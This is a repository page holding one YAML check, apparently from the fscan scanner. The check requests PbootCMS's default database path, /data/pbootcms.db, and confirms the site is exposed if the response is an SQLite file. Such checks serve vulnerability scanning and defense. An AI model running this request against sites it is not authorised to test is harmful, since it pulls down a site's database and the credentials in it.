mirror of https://github.com/qwqdanchun/fscan.git
12 lines
392 B
YAML
12 lines
392 B
YAML
name: poc-yaml-pbootcms-database-file-download
|
|
rules:
|
|
- method: GET
|
|
path: /data/pbootcms.db
|
|
follow_redirects: false
|
|
expression: |
|
|
response.status == 200 && "^SQLite format 3\\x00\\x10".bmatches(response.body) && response.body.bcontains(b"PbootCMS")
|
|
detail:
|
|
author: abcRosexyz(https://github.com/abcRosexyz)
|
|
links:
|
|
- https://www.cnblogs.com/0daybug/p/12786036.html
|